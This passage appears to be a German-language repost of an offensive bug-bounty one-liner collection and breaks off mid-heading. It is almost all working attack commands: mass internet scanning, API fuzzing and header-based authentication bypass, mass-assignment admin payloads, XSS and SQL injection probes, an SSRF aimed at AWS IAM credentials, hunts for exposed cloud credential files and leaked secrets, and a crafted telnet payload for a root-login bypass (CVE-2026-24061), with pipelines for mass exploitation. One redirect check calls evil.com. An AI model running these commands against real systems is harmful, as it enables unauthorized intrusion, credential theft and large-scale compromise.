cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

root@kitploit:~
### Quellcode-Leck```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Konfigurationsdateien```bash

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

root@kitploit:~
### Datenbankdateien```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Nuclei-Scanning

Vollständiger Vorlagen-Scan```bash

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

root@kitploit:~
### CVE-Scannen```bash
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Subdomain-Übernahme```bash

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

root@kitploit:~
### Exponierte Panels```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Fehlkonfigurationen```bash

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

root@kitploit:~
### DAST-Modus```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Benutzerdefinierte Tags```bash

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

root@kitploit:~
### Netzwerkscanning```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 API-Sicherheitstests

GraphQL Introspection```bash

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

root@kitploit:~
### REST API-Enumeration```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

JWT Analyse```bash

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | anew jwts.txt

root@kitploit:~
### API-Schlüsselleck```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Schwache Authentifizierung```bash

Test endpoints without auth

cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

root@kitploit:~
### Ratenbegrenzungstest```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

BOLA/IDOR Testen```bash

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

root@kitploit:~
### 💀 API-Endpunkt-Fuzzing mit ffuf```bash
# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 API-Version-Fuzzing```bash

☠️ Discover hidden API versions

ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

root@kitploit:~
### 💀 Fuzzing von REST-API-Methoden```bash
# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 GraphQL Fuzzing mit ffuf```bash

☠️ Fuzz GraphQL endpoints for introspection and queries

ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

root@kitploit:~
### 💀 API Parameter Fuzzing```bash
# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 API-Authentifizierungsumgehungs-Fuzzing```bash

☠️ Test auth bypass techniques on protected endpoints

cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

root@kitploit:~
### 💀 OpenAPI/Swagger Fuzzing```bash
# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 API JSON Fuzzing mit Nuclei```bash

☠️ Mass API fuzzing with nuclei DAST mode

cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

root@kitploit:~
### 💀 API Massenzuweisungs-Fuzzing```bash
# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ mit benutzerdefinierter Wortlistengenerierung```bash

☠️ Generate API wordlist from JS files and fuzz

cat js.txt | xargs -I@ curl -s @ | grep -oE "["']/(api|v[0-9])/[a-zA-Z0-9/_-]+["']" | tr -d ""'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

root@kitploit:~
---

## ☁️ Cloud-Sicherheit

### AWS S3 Bucket Finder```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3-Berechtigungsprüfung```bash

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

root@kitploit:~
### Firebase Datenbank```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage```bash

cat urls.txt | grep -oE "[a-zA-Z0-9-]+.blob.core.windows.net" | anew azure_blobs.txt

root@kitploit:~
### GCP Storage```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

AWS Metadata SSRF```bash

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

root@kitploit:~
### Cloud-Anmeldedateien```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Automatisierungsskripte

Vollständige Recon-Pipeline```bash

#!/bin/bash domain=$1 mkdir -p $domain && cd $domain

Subdomains

subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt

Alive check

cat subs.txt | httpx -silent -threads 100 | anew alive.txt

URLs

cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt

Vulnerability patterns

cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt

Nuclei scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

root@kitploit:~
### XSS Hunter Script```bash
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

API Recon Script```bash

#!/bin/bash target=$1 mkdir -p $target/api && cd $target/api

Find API endpoints

cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

Extract from JS

cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^"'`\s<>]+)" | sort -u | anew js_api_endpoints.txt

Test GraphQL

cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

root@kitploit:~
## ⚙️ Bash-Funktionen

Füge zu deiner `.bashrc` oder `.zshrc` hinzu:```bash
# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 Neue Einzeiler 2026

⚡🔥⚡ TelnetPwn - CVE-2026-24061 (CVSS 9.8 - KRITISCH) ⚡🔥⚡

💀 Umgehung der Authentifizierung bei GNU InetUtils Telnetd - Sofortige Root-Shell! Wird aktiv ausgenutzt! 💀

⚡ 1. Shodan Massen-Telnet-Erkennung```bash

💀 Find exposed telnet servers worldwide

shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt

root@kitploit:~
#### ⚡ 2. Nmap Telnet-Dienst-Erkennung + Version```bash
# 💀 Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt

⚡ 3. Masscan Schneller Telnet-Scan```bash

💀 Ultra-fast telnet port discovery on large ranges

masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt

root@kitploit:~
#### ⚡ 4. GNU InetUtils Telnetd Fingerprint```bash
# 💀 Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt

⚡ 5. CVE-2026-24061 Schwachstellenprüfung (Sicher)```bash

💀 Test for NEW_ENVIRON option support (vuln indicator)

cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login|root|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt

root@kitploit:~
#### ⚡ 6. Nuclei CVE-2026-24061 Scanner```bash
# 💀 Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt

⚡ 7. Banner Grabbing + Versionsextraktion```bash

💀 Extract telnet banners for version analysis

cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2.[0-7])" | anew potentially_vuln_versions.txt

root@kitploit:~
#### ⚡ 8. Subnet Telnet Hunter```bash
# 💀 Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt

⚡ 9. Telnet + OS Fingerabdruck-Korrelation```bash

💀 Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)

nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn

root@kitploit:~
#### ⚡ 10. Vollständige CVE-2026-24061 Recon Pipeline```bash
# 💀 Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"

⚠️ Betroffen: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) ✅ Lösung: Aktualisieren auf GNU InetUtils 2.8+ oder telnetd deaktivieren und SSH nutzen


⚡🔥⚡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - KRITISCH) ⚡🔥⚡

💀 Kritische unauthentifizierte RCE in n8n Workflow Automation - 100,000+ Server betroffen! Zu CISA KEV hinzugefügt 💀

⚡ n8n-Instanzen erkennen (Shodan/Censys)```bash

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

root@kitploit:~
#### ⚡ Fingerabdruck n8n-Installationen```bash
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

⚡ Verwundbare Webhook-Endpunkte überprüfen```bash

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

root@kitploit:~
#### ⚡ Content-Type-Konfusionserkennung```bash
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

⚡ Massen-n8n-Versionserkennung```bash

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+.[0-9]+.[0-9]+"' | anew n8n_versions.txt

root@kitploit:~
#### ⚡ Nuclei-Vorlagenprüfung für CVE-2026-21858```bash
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Betroffen: n8n < 1.121.0 | ✅ Lösung: Update auf n8n 1.121.0+


⚡🔥⚡ N8n Auth RCE - CVE-2026-21877 (CVSS 10.0 - KRITISCH) ⚡🔥⚡

💀 Authentifizierte RCE über Git-Node in n8n – Cloud & Self-hosted betroffen! 💀

⚡ Git-Node-aktivierte Instanzen erkennen```bash

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

root@kitploit:~
#### ⚡ Überprüfe n8n Authentifizierungsendpunkte```bash
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Betroffen: n8n < 1.121.3 | ✅ Behebung: Aktualisieren auf n8n 1.121.3+


⚡🔥⚡ D-Link DSL RCE - CVE-2026-0625 (CVSS 9.3 - KRITISCH) ⚡🔥⚡

💀 Befehlseinschleusung in älteren D-Link DSL-Routern - Wird aktiv ausgenutzt! 💀

⚡ Shodan Dork für D-Link DSL-Router```bash

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

root@kitploit:~
#### ⚡ Anfälligen dnscfg.cgi-Endpunkt erkennen```bash
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

⚡ Massen D-Link Fingerabdruck```bash

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

root@kitploit:~
> **⚠️ Betroffen: Legacy D-Link DSL Gateway Router (EOL)** | **✅ Behebung: Durch unterstützte Geräte ersetzen**

---

### ⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRITICAL) ⚡🔥⚡

> **💀 RCE mittels Postgres-Parameterinjection in Veeam Backup & Replication 💀**

#### ⚡ Veeam Backup Server erkennen```bash
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

⚡ Fingerprint Veeam Instances```bash

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

root@kitploit:~
> **⚠️ Betroffen:** Veeam B&R 13.0.1.180 und früher | **✅ Behebung:** Aktualisieren auf 13.0.1.1071+

---

### ⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (HOHER SCHWEREGRAD) ⚡🔥⚡

> **💀 Zero-Day-XSS in Grafana – 46,500+ Instanzen noch anfällig! Account-Übernahme möglich 💀**

#### ⚡ Grafana-Instanzen finden```bash
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

⚡ Grafana-Version erkennen```bash

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+.[0-9]+.[0-9]+"' | anew grafana_versions.txt

root@kitploit:~
#### ⚡ Prüfe auf Open Redirect (CVE-2025-4123 Vektor)```bash
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

⚡ Massen-Grafana-Login-Seiten-Erkennung```bash

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

root@kitploit:~
> **⚠️ Betroffen:** Mehrere Grafana-Versionen | **✅ Behebung:** Auf die neueste gepatchte Version aktualisieren

---

### ⚡🔥⚡ CVE-2026 Subdomain Hunting - Massenerkennungspipeline ⚡🔥⚡

> **💀 10 Einzeiler zur Jagd auf CVE-2026-Sicherheitslücken in Subdomains im großen Stil! 💀**

#### ⚡ 1. Vollständige CVE-2026 Subdomain Hunt Pipeline (n8n + Grafana + D-Link)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

⚡ 2. Massenerkennung von n8n CVE-2026-21858 auf Subdomains```bash

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

root@kitploit:~
#### ⚡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner```bash
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

⚡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Subdomain Hunt```bash

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

root@kitploit:~
#### ⚡ 5. Multi-CVE-2026-Scanner mit Nuclei (Parallel Templates)```bash
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

⚡ 6. Subdomain n8n Webhook Fingerprint + CVE-2026-21858 Prüfung```bash

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

root@kitploit:~
#### ⚡ 7. CVE-2026 IoT/Router-Jagd (D-Link DSL + andere Router)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

⚡ 8. Veeam CVE-2025-59470 Subdomain-Erkennung```bash

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13.0.[01].[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

root@kitploit:~
#### ⚡ 9. Kombinierter CVE-2026 Fingerprint + Versions-Extraktor```bash
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

⚡ 10. Vollständiges CVE-2026 Recon-Automatisierungsskript```bash

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

root@kitploit:~
> **🎯 Profi-Tipp:** Kombiniere mit `notify` für Echtzeit-Benachrichtigungen: `... | notify -silent -provider slack`

---

### ⚡🔥⚡ Erweiterte Aufklärungspipeline - 2026 Edition ⚡🔥⚡

> **🎯 10 Elite-Einzeiler für umfassende Aufklärung - Multi-Source-Enumeration, ASN-Erkennung, JS-Analyse & mehr! 🎯**

#### ⚡ 1. Multi-Source-Subdomain-Erkennung + Technologie-Fingerprinting```bash
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Kombiniert Subfinder + Assetfinder + Amass für maximale Subdomain-Abdeckung, validiert dann mit httpx + Technologie-Fingerprinting

⚡ 2. ASN-Enumeration + Reverse-DNS-Erkennung```bash

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

root@kitploit:~
> Ermittelt ASN, zählt IP-Blöcke auf, führt Reverse-DNS durch, um versteckte Subdomains zu finden.

#### ⚡ 3. URL-Erkennungspipeline (Wayback + GAU + Katana)```bash
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Parallele URL-Sammlung von Wayback Machine, Common Crawl, AlienVault + aktives Crawling mit intelligenter Deduplizierung

⚡ 4. JavaScript-Tiefenanalyse + Geheimnis-Scanner```bash

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

root@kitploit:~
> Findet JS-Dateien, extrahiert hartcodierte Geheimnisse (API-Schlüssel, Tokens, AWS-Schlüssel) und versteckte API-Endpunkte

#### ⚡ 5. Certificate Transparency + Subdomain Permutation Attack```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

CT logs-Enumeration + intelligente Permutation (api → api-dev, api-staging) mit massiver DNS-Auflösung

⚡ 6. Port-Erkennung + Webdienste auf nicht standardmäßigen Ports```bash

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

root@kitploit:~
> Schneller Port-Scan + entdeckt Web-Apps, die auf ungewöhnlichen Ports laufen (8080, 8443, 3000, etc)

#### ⚡ 7. GitHub Dorking Automation für Zielorganisation```bash
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Automatisiertes GitHub-Dorking nach Geheimnissen, Anmeldeinformationen und Offenlegung sensibler Daten

⚡ 8. Cloud-Speicher-Erkennung (S3 + Azure + GCP)```bash

cat all_urls.txt | grep -oE '(s3.amazonaws.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.s3.amazonaws.com|storage.googleapis.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.blob.core.windows.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200|403" && echo "[+] {} - Accessible"'

root@kitploit:~
> Extrahiert und validiert Fehlkonfigurationen von Cloud-Speicher-Buckets aus gesammelten URLs

#### ⚡ 9. Parametererkennung + Schwachstellen-Mustererkennung```bash
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extrahiert eindeutige Parameter und kategorisiert nach Schwachstellentyp (XSS, SSRF, SQLi, Redirect)

⚡ 10. Kontinuierlicher Recon-Monitor (Cron-bereit)```bash

